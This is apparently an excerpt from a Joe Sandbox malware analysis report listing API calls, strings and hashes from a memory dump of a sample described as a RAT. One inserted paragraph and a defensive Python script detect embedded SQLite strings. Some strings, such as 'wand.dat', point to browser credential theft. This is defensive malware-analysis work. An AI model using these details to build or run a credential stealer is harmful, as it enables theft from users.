                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 4131475296-0
                                                              • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                              • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2618321458-3614832568
                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AttributesFilefreememset
                                                              • String ID:
                                                              • API String ID: 2507021081-0
                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • free.MSVCRT ref: 00417544
                                                              • free.MSVCRT ref: 00417562
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 4131324427-0
                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • free.MSVCRT ref: 0041822B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PathTemp$free
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 924794160-1420421710
                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
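The two function entries above (the GetTempPathW/GetTempPathA routine with the "%s\etilqs_" format string, and the routine carrying the three foreign-key error messages) are recognisable library strings rather than code the RAT author wrote: "etilqs_" is SQLite's SQLITE_TEMP_FILE_PREFIX and the foreign-key messages are SQLite's own parser diagnostics, which is how an embedded SQLite engine (used to read browser and mail credential databases) shows up in a memory dump. The following Python triage helper is an added example written for this page, not part of the Joe Sandbox report or the sample: it scans a dump for exactly those strings in both narrow and UTF-16LE form, demands corroboration before calling the result "embedded SQLite", and converts hit offsets back to virtual addresses using the report's 0x400000 image base. The dump it scans is a constructed stand-in, not the real sample's bytes.

```python
import re
from typing import Dict, Iterable, List

IMAGE_BASE = 0x400000  # the report's dump is mapped at Offset: 00400000

# Strings copied verbatim from the function entries in the report.  The
# attribution to SQLite is the editor's: "etilqs_" is SQLITE_TEMP_FILE_PREFIX
# in os_win.c, the three "foreign key" messages come from SQLite's fkey.c.
SQLITE_INDICATORS: Dict[str, bytes] = {
    "temp_prefix": b"etilqs_",
    "fk_one_column": b"foreign key on %s should reference only one column of table %T",
    "fk_count_mismatch": (b"number of columns in foreign key does not match "
                          b"the number of columns in the referenced table"),
    "fk_unknown_column": b'unknown column "%s" in foreign key definition',
}

# Any one of these alone is weak; the temp prefix plus a parser message is not.
PARSER_MESSAGES = {"fk_one_column", "fk_count_mismatch", "fk_unknown_column"}


def _encodings(needle: bytes) -> Iterable[bytes]:
    """The temp-path routine calls both GetTempPathW and GetTempPathA, so the
    strings may be stored as ANSI or as UTF-16LE; search for both forms."""
    yield needle
    yield needle.decode("ascii").encode("utf-16-le")


def scan_dump(dump: bytes) -> Dict[str, List[int]]:
    """Return {indicator_name: [file offsets]} for every indicator present."""
    hits: Dict[str, List[int]] = {}
    for name, needle in SQLITE_INDICATORS.items():
        offs = [m.start()
                for enc in _encodings(needle)
                for m in re.finditer(re.escape(enc), dump)]
        if offs:
            hits[name] = sorted(offs)
    return hits


def embedded_sqlite_verdict(hits: Dict[str, List[int]]) -> bool:
    """True only when the temp-file prefix is corroborated by at least one
    SQLite parser diagnostic; a packer stub could carry 'etilqs_' by itself."""
    return "temp_prefix" in hits and bool(PARSER_MESSAGES & hits.keys())


def to_va(offset: int, base: int = IMAGE_BASE) -> int:
    """Map a dump offset to the virtual address the report's xrefs use.
    Assumes the dump is a flat image of the module (no section slide)."""
    return base + offset


def build_sample_dump() -> bytes:
    """Constructed stand-in for a memory dump; NOT bytes from the real sample.
    Layout: 1024 bytes padding, narrow temp-path format string, 1024 bytes
    padding, one UTF-16LE foreign-key message, 1024 bytes padding."""
    filler = bytes(range(256)) * 4  # 1024 bytes that match none of the needles
    fk_msg = SQLITE_INDICATORS["fk_one_column"].decode("ascii").encode("utf-16-le")
    return b"".join([
        filler,
        b"%s\\etilqs_\x00",          # "%s\etilqs_" as listed in the report
        filler,
        fk_msg + b"\x00\x00",
        filler,
    ])


if __name__ == "__main__":
    found = scan_dump(build_sample_dump())
    for name, offs in found.items():
        print(name, ["0x%08X" % to_va(o) for o in offs])
    print("embedded SQLite:", embedded_sqlite_verdict(found))
```

Run against a real dump, the offsets printed for "fk_one_column" and friends should land near the report's xrefs (004316CD, 004316F5, 00431858) once converted with to_va; a large discrepancy means the dump is not a flat image at 0x400000 and the base argument needs adjusting.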
                                                              APIs
                                                              • memset.MSVCRT ref: 0044A6EB
                                                              • memset.MSVCRT ref: 0044A6FB
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • free.MSVCRT ref: 004174E4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                              • String ID:
                                                              • API String ID: 4053608372-0
                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                              APIs
                                                              • free.MSVCRT ref: 0040F561
                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$free
                                                              • String ID: g4@
                                                              • API String ID: 2888793982-2133833424
                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                              • free.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
